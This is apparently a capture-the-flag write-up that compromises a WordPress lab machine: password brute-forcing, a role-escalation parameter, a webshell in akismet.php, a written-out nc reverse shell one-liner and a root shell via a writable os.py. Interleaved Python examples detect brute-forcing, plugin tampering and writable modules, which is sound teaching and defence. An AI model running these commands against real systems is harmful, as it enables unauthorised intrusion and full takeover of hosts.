Target IP: 10.10.133.0
Challenge Description:
The challenge says to add the hostname jack.thm to my /etc/hosts file. I made the change to /etc/hosts as shown above.
A port scan shows two TCP ports open on the target machine: SSH and HTTP, as shown above. I am assuming the WordPress application runs on port 80 of the target machine.
An aggressive port scan against the two open TCP ports returns the result above. It identified the WordPress application and a Disallow entry for /wp-admin in robots.txt. Time for a subdomain search. The subdomain search only found the entry www, so I added that entry to my /etc/hosts file as well.
Port 80: HTTP
Browsing to port 80 displays the webpage above. In the image above, there is one post created by the user jack.
According to Wappalyzer, the target machine is running WordPress 5.3.2 version as shown above. Now I have more information about the web application.
Using wpscan with the command wpscan --url http://jack.thm --enumerate u,ap (user and plugin enumeration), it found the three usernames of the web application shown above. Maybe I can brute-force their passwords?
And bingo! I tried to brute-force the passwords of the three users with the rockyou.txt wordlist, but had no luck even after thirty minutes. Then I switched to fasttrack.txt and got a hit for the user wendy, as shown above. Now I have the credentials wendy:changelater.
I browsed to the /wp-login page and logged in with the brute-forced credentials.
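The password guessing above leaves an obvious trail in the web server's access log: many POSTs to /wp-login.php from one client in a short span. The following Python is an example added to this write-up (not code from the original, and not from the room) that flags such a burst. The log lines are constructed, the client addresses are documentation-range values, and the failed/successful split relies on WordPress's usual behaviour of re-serving the login form with HTTP 200 after a wrong password and answering a correct one with a 302 redirect.

```python
"""Flag password-guessing bursts against wp-login.php in combined-format
access logs. Added example; the sample log below is constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one client hammering wp-login.php, one normal visitor.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:12:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4821
198.51.100.7 - - [10/Mar/2024:12:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4821
198.51.100.7 - - [10/Mar/2024:12:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4821
198.51.100.7 - - [10/Mar/2024:12:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4821
198.51.100.7 - - [10/Mar/2024:12:00:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0
192.0.2.10 - - [10/Mar/2024:12:00:05 +0000] "GET /index.php HTTP/1.1" 200 7120
192.0.2.10 - - [10/Mar/2024:12:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""

# Apache/nginx "combined" format up to the status code; the rest is ignored.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return the fields we need from one access-log line, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def login_failures(lines):
    """Yield (ip, timestamp) for each POST to wp-login.php answered with 200.
    Assumption: WordPress returns 200 (form again) on a wrong password and
    302 (redirect to the dashboard) on success."""
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["method"] == "POST"
                and rec["path"].startswith("/wp-login.php")
                and rec["status"] == 200):
            yield rec["ip"], rec["ts"]


def detect_bruteforce(lines, threshold=4, window=timedelta(seconds=60)):
    """Return {ip: peak_failures} for every client whose failed logins reach
    `threshold` inside any span of length `window` (sliding window)."""
    by_ip = defaultdict(list)
    for ip, ts in login_failures(lines):
        by_ip[ip].append(ts)
    alerts = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


if __name__ == "__main__":
    for ip, count in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"possible password guessing from {ip}: {count} failures in window")
```

On a real site the same logic runs over the live log file; the threshold and window are tuning knobs, and XML-RPC based guessing (POST /xmlrpc.php) is worth a second filter because it never touches wp-login.php.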
Now I have access to the WordPress application with the credentials of user wendy, as shown above. However, this user has low privileges: I cannot change the theme, view the plugins, etc. I scanned for vulnerable plugins and themes but had no luck. I have hit a brick wall.
After some online searching, I found that the web application could be vulnerable via the User Role Editor plugin. I found the interesting article above; maybe I can test it against the target machine?
The article in the previous image says to use Burp Suite to intercept the request sent when pressing the Update Profile button in the Your Profile section, append &ure_other_roles=administrator to it, and follow the redirects.
After doing so, I have administrator privileges as the user wendy on the WordPress application, as shown above. Now I can change the themes to obtain a reverse shell connection. However, I had no luck when I tried to change the theme files with my PHP reverse shell. Time to enumerate harder.
I noticed that the Akismet plugin is installed. I inserted my PHP webshell at the beginning of akismet.php, as shown above.
And bingo! Now I can access my PHP webshell. I issued the commands ls;id;whoami and obtained the output above. Time to leverage this into a reverse shell connection. I started a listener on my machine at port 8443.
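The modified akismet.php would have been caught by a simple integrity baseline of the plugin directory. The following Python is an example added to this write-up (not code from the original, nor from WordPress or Akismet): it hashes every file under a plugin directory, then reports files whose hash changed, files that appeared, and files that vanished relative to the stored baseline. The demo builds a small constructed stand-in for the plugin directory and prepends one line to its main file, mirroring the change described above without any payload.

```python
"""Hash-based integrity baseline for a plugin directory. Added example;
the plugin files created in demo() are constructed stand-ins."""
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root):
    """Return {relative_path: sha256_hex} for every regular file under root."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = str(path.relative_to(root))
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Classify files as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline
                           if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Snapshot a constructed plugin directory, alter it, and report the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = Path(tmp) / "akismet"
        plugin.mkdir()
        main_file = plugin / "akismet.php"
        main_file.write_text("<?php\n// constructed stand-in for the plugin bootstrap\n")
        (plugin / "readme.txt").write_text("constructed readme\n")

        baseline = hash_tree(plugin)  # taken right after a clean install

        # Prepend a line to the main file (as the write-up did) and drop a new file.
        main_file.write_text("<?php /* injected line */ ?>\n" + main_file.read_text())
        (plugin / "dropped.php").write_text("<?php // constructed new file ?>\n")

        return diff_baseline(baseline, hash_tree(plugin))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

In practice the baseline is taken from a known-good install (or from the published package hashes, which is what WP-CLI's `wp plugin verify-checksums` compares against) and stored outside the web root, so that a web-shell author with write access to wp-content cannot also rewrite the baseline.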
Using the PHP webshell, I issued the URL-encoded nc reverse shell payload rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff. Now I have a foothold on the target machine with a session as www-data, as shown above.
After landing a shell on the target machine, I found a user called jack. This user has a file called reminder.txt, as shown above. Can I find the backup files?
I ran the command find / -name "*backup*" 2>/dev/null to find any file names containing backup. This led to the directory /var/backups, as shown above, and this directory contains an SSH key.
Does this SSH key belong to the user jack? I made a copy of the SSH key on my machine and changed its permissions to 400.
And bingo! Using the SSH key, I managed to connect to the target machine as the user jack. I successfully elevated my privileges from www-data to jack as shown above.
I transferred pspy64 to the target machine and obtained the interesting result above: the Python script checker.py is being executed as the user root.
I browsed to /opt/statuscheck and found two files: checker.py and output.log. The content of checker.py is shown above. I cannot modify the Python file directly as I do not have enough privileges. Maybe I can edit the os module it imports instead?
Running the command find / -writable -type f 2>/dev/null shows that /usr/lib/python2.7/os.py is writable!
I inserted my Python reverse shell script at the bottom of os.py in the /usr/lib/python2.7 directory. Because the payload now lives inside the os module itself, every reference to os in it is removed. Then I started a listener on my machine at port 8444.
After waiting about a minute, I received a reverse shell connection on my machine at port 8444. Now I have root access on the target machine :)
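The root path above rests on one misconfiguration: a file on the interpreter's library path (os.py) was writable by a low-privileged user while a root job imported it. The following Python is an example added to this write-up (not code from the original or from the room) that audits a list of library directories for modules or directories with the group or world write bit set, which is the check a defender would run over the sys.path of the interpreter a privileged job uses. The demo builds a constructed stand-in for /usr/lib/python2.7 with one world-writable file; the criterion (group/world write bit) is an assumption chosen for the audit, not something the write-up states.

```python
"""Audit Python library directories for files writable by non-owners.
Added example; the directory built in demo() is a constructed stand-in."""
import os
import stat
import tempfile
from pathlib import Path


def writable_by_others(path):
    """True if the group or world write bit is set on `path`.
    A root-owned module that any user can rewrite is the condition abused above."""
    mode = os.stat(path, follow_symlinks=False).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_module_paths(search_path):
    """Return [(path, 'dir'|'file')] for every directory and .py file under the
    given search-path entries that is writable by group or others.
    A writable directory counts too: a new module can be dropped into it."""
    findings = []
    for entry in search_path:
        base = Path(entry)
        if not base.is_dir():
            continue
        if writable_by_others(base):
            findings.append((str(base), "dir"))
        for p in sorted(base.rglob("*")):
            if p.is_symlink():
                continue
            if p.is_dir() and writable_by_others(p):
                findings.append((str(p), "dir"))
            elif p.is_file() and p.suffix == ".py" and writable_by_others(p):
                findings.append((str(p), "file"))
    return findings


def demo():
    """Build a constructed library tree with one loose file and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp) / "python2.7"
        lib.mkdir()
        (lib / "os.py").write_text("# constructed stand-in for the stdlib os module\n")
        (lib / "helper.py").write_text("# constructed stand-in, correctly protected\n")
        (lib / "os.py").chmod(0o666)      # the misconfiguration
        (lib / "helper.py").chmod(0o644)  # the normal case
        lib.chmod(0o755)
        return [Path(p).name for p, kind in audit_module_paths([str(lib)])]


if __name__ == "__main__":
    # On a real host, feed it the sys.path of the interpreter the root job uses.
    import sys
    for path, kind in audit_module_paths(sys.path):
        print(f"{kind} writable by non-owner: {path}")
    print("demo findings:", demo())
```

The same audit covers the broader case of any directory a privileged job imports from; the remediation is simply root ownership with mode 755 for directories and 644 for modules, so that a write-enabled os.py never appears in the output.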
The user.txt flag is shown above. This flag is located at the home directory of the user jack.
The root.txt flag is shown above. This flag is obtainable after exploiting the os.py module.